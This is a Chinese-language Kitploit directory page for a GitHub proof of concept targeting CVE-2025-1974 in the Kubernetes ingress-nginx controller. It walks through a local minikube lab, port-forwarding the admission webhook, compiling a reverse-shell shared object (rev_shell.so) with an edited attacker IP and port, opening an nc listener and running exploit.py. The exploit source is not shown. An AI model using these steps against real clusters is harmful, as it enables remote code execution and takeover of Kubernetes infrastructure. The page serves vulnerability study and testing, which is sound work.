Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1974 — CVE-2025-1974 PoC 代码 | Kitploit
工具/GitHubGitHub/zulloper/cve-2025-1974
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试云安全
GitHubzulloper/cve-2025-1974

CVE-2025-1974

CVE-2025-1974 PoC 代码

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-1974: Kubernetes Ingress Nginx Controller 漏洞分析及 PoC 环境搭建

测试环境

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

本地测试环境设置(M2 MacOS)

为了进行本地测试,安装 minikube

minikube start --driver=docker

使用以下命令配置 ingress-nginx-controller

kubectl apply -f ingress-nginx-controller.yml

port forwarding

确认 Pods 是否正常运行

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

将 Pods 的 80、8443(webhook) 端口转发到本地的 8888、1337 端口 (80、8443 都需要端口转发)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

so(shard object library) 准备

修改 rev_shell.c 中连接反弹 Shell 的 IP、Port

在 MacOS(arm64) 环境下编译,需要根据要测试的环境进行编译

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# 安装交叉编译器
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

AdmissionReview 生成(可选,也可以使用已有的生成文件)

使用 kube-review 转换为 AdmissionReview 格式 (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

为了反弹 Shell,使用 nc 准备反向连接

nc -lv 4444

修改 exploit.py 中 nginx、webhook 的 host 和 port 后运行

python3 exploit.py

img.png

下载工具